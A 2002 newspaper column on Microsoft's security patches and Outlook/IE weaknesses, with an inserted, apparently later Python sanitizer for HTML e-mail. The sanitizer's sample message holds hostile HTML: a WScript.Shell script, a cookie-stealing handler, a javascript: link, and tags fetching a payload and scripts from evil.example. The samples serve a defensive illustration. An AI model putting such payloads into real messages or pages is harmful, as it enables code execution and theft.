Microsoft tells of even minor security flaws

September 05, 2002

It's almost like a greeting from an old friend. You start up your computer, log on to the Internet, and up pops a little gray box:

"Microsoft Critical Update Notification: New critical updates are available for your computer. Microsoft strongly suggests that you install these updates now."

When you click the "View Updates" button, you're whisked to Microsoft's Web site, where you can download a fix for the latest Windows security flub.

I've seen plenty of these warnings lately. Last week, it was a fix for a critical security flaw that threatened my "Digital Certificates," whatever they are. The week before it was yet another security bug in Internet Explorer that could allow a hacker to take over my computer, and before that, a flaw in Office XP that could allow a script kiddie in Kazakhstan to burn down my house by remote control, or something like that.

All told, Microsoft has issued 48 security bulletins so far this year, and may well break last year's record of 60. That doesn't count security bugs that other people discover and make public before Microsoft gets a chance to announce them.

What's going on here? Are we risking life, liberty and property every time we turn on our computers?

The answer is no. And yes.

There's no question that Microsoft Windows and its primary applications have more holes than a prairie dog village.

This is the legacy of a corporate culture that developed around personal computers in the 1980s, when few PCs were connected to anything. The young Bill Gates and his Microsoft cohorts were hackers of the old school whose mission in life was to make computers do cool things and provide tools for developers and users who wanted to do the same thing. The notion that somebody might use those same tools to create mischief wasn't on anybody's mind.

Fast forward 20 years and we have hundreds of millions of personal computers that are connected - on corporate networks and over the Internet. Unfortunately, those computers run software that was the product of a stand-alone mindset.

Consider Internet Explorer and its companion e-mail programs, Outlook and Outlook Express. A Web browser is, by design, a program that runs code supplied by whoever built the page you're viewing - scripts, plug-ins and ActiveX controls - which means it lets a stranger take a measure of control over your computer, albeit at your invitation.

In the best of all worlds, a browser would put strict limits on what that code can do. It certainly shouldn't let a Web page designer steal information, destroy files or plant programs that can take over your computer.

Although it never deliberately let that happen, Microsoft expended far more effort on adding new features and e-commerce tools to IE than it did on building defenses against hackers who might turn those features around for nefarious purposes. Over the past few years, hackers have figured out how to do just that.

Outlook and Outlook Express compound these flaws by displaying HTML-formatted e-mail with the same engine IE uses to display Web pages. No longer does an attacker need you to visit a Web site to execute malicious code; it's enough that you open the message, or simply let it appear in the preview pane. Moreover, because Microsoft has built so many programming "hooks" into Windows and Office, it's relatively easy for virus writers to hijack Outlook itself - commandeering its address book and sending routines to mail copies of a worm to everyone you know, as Melissa and "ILOVEYOU" did.
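What "strict limits" on HTML mail could look like in practice, as an added example that is not code from this column or from Microsoft: the hypothetical sanitize_html_mail() below, written in Python with only the standard library, takes an untrusted HTML message body and keeps nothing but an allowlist of formatting tags and attributes. Scripts, event-handler attributes, embedded objects and frames, comments (including IE's conditional comments) and any link whose scheme is not http, https or mailto are thrown away before anything is rendered. The sample message is constructed for the example.

```python
"""Allowlist sanitizer for HTML e-mail (added illustration, not Microsoft's code).

Before a mail client renders a message's HTML it should discard everything
that can run code or pull in remote content and keep only harmless formatting.
"""
from html import escape
from html.parser import HTMLParser

# Formatting a preview pane legitimately needs. Anything not listed here
# (img, form, svg, ...) is dropped as a tag; its text, if any, is kept.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a", "ul", "ol", "li",
                "blockquote", "h1", "h2", "h3", "table", "tr", "td", "th"}
VOID_TAGS = {"br"}
# Elements whose contents are themselves active (or invisible): the contents
# go too, not just the tag.
DROP_WITH_CONTENT = {"script", "style", "object", "embed", "iframe", "applet"}
ALLOWED_ATTRS = {"a": {"href"}, "td": {"colspan"}, "th": {"colspan"}}
# Only absolute links with a known-harmless scheme survive; "javascript:",
# "data:", "vbscript:" and relative URLs are all refused by the allowlist.
SAFE_SCHEMES = ("http://", "https://", "mailto:")


class MailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []          # sanitized HTML fragments
        self.dropped = []      # audit trail of what was removed
        self.skip_depth = 0    # > 0 while inside a DROP_WITH_CONTENT element

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth += 1          # nested <object><embed>...
            return
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = 1
            self.dropped.append(f"<{tag}> (with content)")
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append(f"<{tag}>")
            return
        kept = []
        for name, value in attrs:             # HTMLParser lowercases names
            value = value or ""
            if name.startswith("on"):         # onload=, onmouseover=, ...: script
                self.dropped.append(f"{tag}@{name}")
            elif name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append(f"{tag}@{name}")
            elif name == "href" and not value.strip().lower().startswith(SAFE_SCHEMES):
                self.dropped.append(f"{tag}@href={value!r}")
            else:
                kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth -= 1
        elif tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            # Character references were decoded on input; re-escape on output.
            self.out.append(escape(data, quote=False))

    def handle_comment(self, data):
        # Conditional comments (<!--[if IE]>...) are where IE-only script hides.
        self.dropped.append("comment")


def sanitize_html_mail(html):
    """Return (clean_html, dropped_items) for an untrusted HTML message body."""
    parser = MailSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out), parser.dropped


# Constructed sample message (not a real mail): formatting worth keeping,
# mixed with the kinds of content the column warns about.
SAMPLE_MESSAGE = """<p>Hi, your <b>invoice</b> is attached.</p>
<script>new ActiveXObject("WScript.Shell").Run("calc.exe")</script>
<p onmouseover="stealCookies()">Hover for details</p>
<a href="javascript:window.location='http://evil.example/'">Click here</a>
<a href="http://example.com/invoice">Your invoice</a>
<object data="http://evil.example/payload.exe"></object>
<iframe src="http://evil.example/"></iframe>
<!--[if IE]><script src="http://evil.example/x.js"></script><![endif]-->
<p>Thanks &amp; regards<br>Accounts</p>"""

if __name__ == "__main__":
    clean, dropped = sanitize_html_mail(SAMPLE_MESSAGE)
    print(clean)
    print("dropped:", dropped)
```

The design choice that matters is that everything is an allowlist: a denylist of "javascript:" would be dodged by odd casing, embedded whitespace or a "data:" URL, whereas refusing every scheme but three has no such gaps. Dropping img along with the rest also stops the "Web bug" that tells a spammer the moment a message is previewed. The dropped list is worth logging; a message that sheds a script tag or an event handler on the way to the preview pane is one a user might want to hear about.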

Unfortunately, these are just two of the many security lapses that Microsoft has been hammered for over the past two years. Many others affect the servers that run corporate networks, e-commerce operations and Web sites.

Gates finally owned up to the problem in January, when he sent a rare message to all Microsoft employees announcing a new "Trustworthy Computing" initiative. Henceforth, he declared, the company's top priority would be security and user privacy - new programs and features would come second.

Indeed, Microsoft is cleaning up its act. When it finds a flaw, it generally fixes the problem, announces it to the world and - if the bug is serious enough - invites users to download a fix.

Which raises another question. How serious are these security bugs? They're certainly treated seriously in the press when Microsoft itself calls them "critical."

Since I've never been bitten by one, I called the best professional troubleshooter I know, Marc Seidler, and asked him how often he encounters the problems these fixes are designed to prevent. Seidler, proprietor of a local consulting business known as The Computer Doctors, has operated on thousands of troubled PCs in businesses and homes over the past half-dozen years. He regularly monitors Microsoft's technical Web sites, which he says are excellent.

"I have never seen one of these sort of security issues" in a client's computer, he said.

"Most of these things are discovered in the lab," he added, and many are important mainly to large businesses with sophisticated networks.

"But if you're sitting at home and have Comcast or DSL [Internet service], it's not an issue."

Baltimore Sun Articles